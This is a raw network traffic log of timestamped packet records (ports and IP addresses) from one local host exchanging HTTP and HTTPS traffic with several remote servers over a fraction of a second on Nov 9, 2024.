Nov 9, 2024 02:47:34.245002031 CET	443	53024	20.99.185.48	192.168.2.7
Nov 9, 2024 02:47:34.245024920 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.245031118 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245032072 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245059013 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245076895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245089054 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245091915 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245104074 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245105982 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245119095 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245121956 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245136023 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245140076 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245163918 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245163918 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245177031 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245189905 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245203018 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245203972 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245223999 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245235920 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245235920 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245249033 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245265007 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245266914 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245287895 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245305061 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245304108 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245352030 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245376110 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245398998 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245405912 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245414019 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245423079 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245426893 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245440006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245445013 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245470047 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245471954 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245484114 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245491982 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245511055 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245518923 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245528936 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245537043 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245553017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245562077 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245564938 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245582104 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245584965 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245590925 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245608091 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245624065 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245748043 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245759010 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245769024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245800018 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245809078 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245814085 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.245839119 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.245865107 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.270744085 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.270768881 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.270857096 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.270875931 CET	53025	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.270889997 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.270945072 CET	53025	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.270945072 CET	53025	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.272289038 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.272313118 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.272356033 CET	53025	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.272363901 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.272393942 CET	53025	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.272414923 CET	53025	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.295126915 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.295192957 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.295224905 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.295273066 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.295280933 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.295356035 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.295384884 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.295401096 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.295408964 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.295430899 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.295545101 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.295603037 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.295609951 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.295650959 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.295759916 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.295792103 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.295805931 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.295814037 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.295849085 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.295857906 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.295919895 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.295927048 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.296235085 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.296266079 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.296283007 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.296289921 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.296317101 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.296350956 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.296360970 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.296366930 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.296394110 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.296912909 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.296955109 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.296978951 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.296984911 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.297015905 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.297049999 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.297066927 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.297075987 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.297105074 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.297112942 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.297142982 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.297168016 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.297190905 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.297221899 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.297230005 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.297255993 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.297324896 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.297328949 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.297374964 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.297744036 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.297801018 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.297869921 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.297878027 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.297972918 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.298019886 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.298048973 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.298074961 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.298082113 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.298089981 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.298110962 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.298154116 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.298158884 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.298188925 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.298270941 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.298288107 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.298738003 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.298772097 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.298793077 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.298799038 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.298861980 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.307563066 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.312385082 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.365607023 CET	443	53024	20.99.185.48	192.168.2.7
Nov 9, 2024 02:47:34.365698099 CET	53024	443	192.168.2.7	20.99.185.48
Nov 9, 2024 02:47:34.366604090 CET	53024	443	192.168.2.7	20.99.185.48
Nov 9, 2024 02:47:34.366626978 CET	443	53024	20.99.185.48	192.168.2.7
Nov 9, 2024 02:47:34.373796940 CET	53047	443	192.168.2.7	20.99.185.48
Nov 9, 2024 02:47:34.373816013 CET	443	53047	20.99.185.48	192.168.2.7
Nov 9, 2024 02:47:34.373905897 CET	53047	443	192.168.2.7	20.99.185.48
Nov 9, 2024 02:47:34.374099016 CET	53047	443	192.168.2.7	20.99.185.48
Nov 9, 2024 02:47:34.374113083 CET	443	53047	20.99.185.48	192.168.2.7
Nov 9, 2024 02:47:34.386797905 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.386821032 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.386909962 CET	53025	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.386918068 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.387028933 CET	53025	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.388498068 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.388515949 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.388561964 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.388600111 CET	53025	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.388607979 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.388633966 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.388674021 CET	53025	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.388674021 CET	53025	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.389230013 CET	53025	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.389238119 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.389616966 CET	53048	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.389635086 CET	443	53048	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.389698029 CET	53048	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.390410900 CET	53048	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.390423059 CET	443	53048	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.400403023 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.400408030 CET	443	53031	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.400810957 CET	53031	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.400819063 CET	443	53031	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.401021004 CET	53029	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.401027918 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.401942968 CET	443	53031	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.402028084 CET	53031	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.402154922 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.402234077 CET	53029	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.403964043 CET	53029	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.404027939 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.404313087 CET	53031	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.404373884 CET	443	53031	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.404680014 CET	53029	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.404687881 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.404779911 CET	53031	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.404786110 CET	443	53031	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.406685114 CET	443	53027	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.407001972 CET	53027	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.407008886 CET	443	53027	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.408119917 CET	443	53027	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.408188105 CET	53027	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.408771992 CET	53027	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.408854008 CET	443	53027	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.408869982 CET	53027	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.413461924 CET	443	53030	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.413599968 CET	443	53032	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.413644075 CET	53030	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.413654089 CET	443	53030	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.413912058 CET	53032	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.413932085 CET	443	53032	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.414827108 CET	443	53030	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.414879084 CET	53030	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.415002108 CET	443	53032	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.415062904 CET	53032	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.415271997 CET	53030	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.415350914 CET	443	53030	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.415442944 CET	53030	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.415450096 CET	443	53030	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.415736914 CET	53032	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.415803909 CET	443	53032	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.415885925 CET	53032	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.415894032 CET	443	53032	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.416210890 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.416280031 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.416315079 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.416357040 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.416367054 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.416517973 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.418298960 CET	443	53028	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.418368101 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.418423891 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.418474913 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.418528080 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.418529987 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.418596029 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.421395063 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.421401978 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.423697948 CET	53028	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.423707008 CET	443	53028	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.424088001 CET	443	53028	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.426903009 CET	53028	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.426973104 CET	443	53028	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.427222967 CET	53028	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.448951006 CET	53029	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.448991060 CET	53027	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.449002981 CET	443	53027	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.467327118 CET	443	53028	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.487441063 CET	53030	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.487443924 CET	53031	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.528738022 CET	443	53031	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.528763056 CET	443	53031	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.528825998 CET	53031	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.528841972 CET	443	53031	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.528853893 CET	443	53031	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.528898001 CET	53031	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.530407906 CET	53031	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.530419111 CET	443	53031	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.536581039 CET	443	53027	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.536643028 CET	53027	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.536647081 CET	443	53027	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.536690950 CET	53027	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.544661045 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.544696093 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.544708967 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.544723034 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.544732094 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.544748068 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.544755936 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.544761896 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.544790030 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.544810057 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.544819117 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.544831991 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.544842005 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.544868946 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.544893980 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.544917107 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.544930935 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.544946909 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.544960022 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.544965029 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.544971943 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.544977903 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.544989109 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.544998884 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545000076 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545006990 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545013905 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545027971 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545034885 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545052052 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545064926 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545066118 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545077085 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545082092 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545115948 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545134068 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545377016 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545387983 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545403957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545430899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545439005 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545443058 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545454979 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545460939 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545475006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545484066 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545486927 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545499086 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545511007 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545516014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545531988 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545536995 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545550108 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545558929 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545572042 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545572996 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545594931 CET	443	53032	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.545600891 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545614004 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545638084 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545655966 CET	443	53032	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.545656919 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545664072 CET	53032	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.545670033 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545677900 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545679092 CET	443	53030	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.545681953 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545695066 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545706034 CET	443	53030	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.545708895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.545710087 CET	53032	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.545711040 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545722961 CET	443	53030	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.545732975 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545768976 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.545768976 CET	53030	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.545778036 CET	443	53030	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.545789957 CET	53030	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.545841932 CET	443	53030	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.545859098 CET	80	52982	77.220.212.32	192.168.2.7
